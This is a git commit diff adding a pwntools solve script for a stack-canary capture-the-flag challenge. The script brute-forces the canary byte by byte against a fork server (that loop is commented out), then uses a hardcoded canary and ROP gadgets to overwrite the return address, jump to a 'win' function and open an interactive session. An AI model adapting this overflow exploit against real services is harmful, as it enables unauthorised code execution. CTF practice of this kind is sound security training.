Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/canary/02_fortune_cookie/solve.py
+++ b/canary/02_fortune_cookie/solve.py
@@ -0,0 +1,56 @@
+#!/usr/bin/env python3
+import time
+
+from pwn import *
+
+HOST, PORT = "offsec.m0lecon.it", 13569
+# HOST, PORT = '127.0.0.1', 4444
+OFFSET_TO_CANARY = 72
+OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
+
+elf = ELF("./fortune_cookie", checksec=False)
+
+# bruteforce canary on fork server
+known = b"\x00"
+"""for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * OFFSET_TO_CANARY + guess
+
+        io = remote(HOST, PORT, level='error')
+        io.recvuntil(b"wish\n")
+        io.send(payload)
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+
+        if b"OK" in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+"""
+# canary = u64(known)
+canary = 0x4F03B0B41EBDDB00
+log.info(f"Canary: {canary:#x}")
+# gadget = 0x4013cf
+gadget = 0x000000000040190D
+gadget4 = 0x0000000000401016
+gadget3 = 0x0000000000401438
+gadget2 = 0x40101A
+io = remote(HOST, PORT)
+io.recvuntil(b"wish\n")
+payload = flat(
+    b"A" * OFFSET_TO_CANARY,
+    p64(canary),
+    # b'B' * 8,
+    b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    p64(gadget2),  # Gadget
+    p64(elf.sym.win),
+)
+io.send(payload)
+# io.recvline()
+io.interactive()
+# io.sendline(b'ls')
+io.recvline()